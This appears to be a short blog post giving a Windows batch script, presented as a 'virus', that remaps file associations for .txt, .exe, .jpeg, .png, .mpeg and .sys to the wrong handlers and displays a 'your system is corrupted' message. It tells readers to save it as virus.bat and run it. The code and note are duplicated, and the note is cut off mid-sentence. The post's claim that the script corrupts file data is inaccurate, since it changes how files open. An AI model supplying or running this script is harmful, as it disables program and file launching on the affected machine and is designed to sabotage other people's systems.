Create a Non-Text Virus in Notepad
The non text virus change the format of your file in a way crupt the data if the file are in these format(.exe .jpeg .png .mpeg .sys)
Code:
@echo off
assoc.txt=jpegfile
assoc.exe=htmlfile
assoc.jpeg=avifile
assoc.png=mpegfile
assoc.mpeg=txtfile
assoc.sys=regfile
msg your system is corrupted
exit
Save it a (virus.bat) and run it
Note:- It is too dangerous, there is only
Code:
@echo off
assoc.txt=jpegfile
assoc.exe=htmlfile
assoc.jpeg=avifile
assoc.png=mpegfile
assoc.mpeg=txtfile
assoc.sys=regfile
msg your system is corrupted
exit
Save it a (virus.bat) and run it
Note:- It is too dangerous, there is only
Comments
Post a Comment